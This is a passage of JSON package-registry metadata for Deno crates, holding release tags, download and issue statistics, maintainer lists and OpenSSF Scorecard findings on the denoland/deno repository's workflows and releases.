-10-27T15:13:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.10/manifests"},{"name":"v0.1.9","sha":"c85311dd7dbad09242633d2ee7a83fdb1cbd1d7f","kind":"commit","published_at":"2018-10-21T00:30:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.9/manifests"},{"name":"v0.1.8","sha":"d92c99eabaf28100a8d181b6f289e2e3fc295107","kind":"commit","published_at":"2018-10-12T18:44:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.8/manifests"},{"name":"v0.1.7","sha":"5307aa94e14d99a226366a275e011a60161c9c39","kind":"commit","published_at":"2018-10-04T12:56:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.7/manifests"},{"name":"v0.1.6","sha":"77e876388bf1b2b3959f25a1cb057a1f96c76ba7","kind":"commit","published_at":"2018-09-29T17:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.6/manifests"},{"name":"v0.1.5","sha":"8e958d3ad68e610061e82fb9f456eab79330633e","kind":"commit","published_at":"2018-09-22T03:21:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.5/manifests"},{"name":"v0.1.4","sha":"d38b3b585ca68f4bc9e95faa6c9c036dc8982575","kind":"commit","published_at":"2018-09-13T00:45:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-23T06:42:24.263Z","dependent_packages_count":11,"downloads":600763,"downloads_period":"total","dependent_repos_count":31,"rankings":{"downloads":5.215714413848776,"dependent_repos_count":5.108702968297772,"dependent_packages_count":3.249594268149489,"stargazers_count":0.002243493867783428,"forks_count":0.05758300927310799,"docker_downloads_count":6.773817180979163,"average":3.4012758890693484},"purl":"pkg:cargo/deno_broadcast_channel","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_broadcast_channel","docker_dependents_count":1,"docker_downloads_count":5,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_broadcast_channel","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_broadcast_channel/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_broadcast_channel/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:20.709Z","updated_at":"2022-11-07T18:29:20.709Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:23.731Z","updated_at":"2023-07-18T22:41:23.731Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":1080038,"name":"deno_net","ecosystem":"cargo","description":"Networking for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":249,"first_release_published_at":"2021-06-28T23:42:19.256Z","latest_release_published_at":"2026-08-27T15:20:02.712Z","latest_release_number":"0.250.0","last_synced_at":"2026-09-07T23:01:17.476Z","created_at":"2022-04-07T21:02:24.136Z","updated_at":"2026-09-07T23:01:17.476Z","registry_url":"https://crates.io/crates/deno_net/","install_command":"cargo install deno_net","documentation_url":"https://docs.rs/deno_net/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: 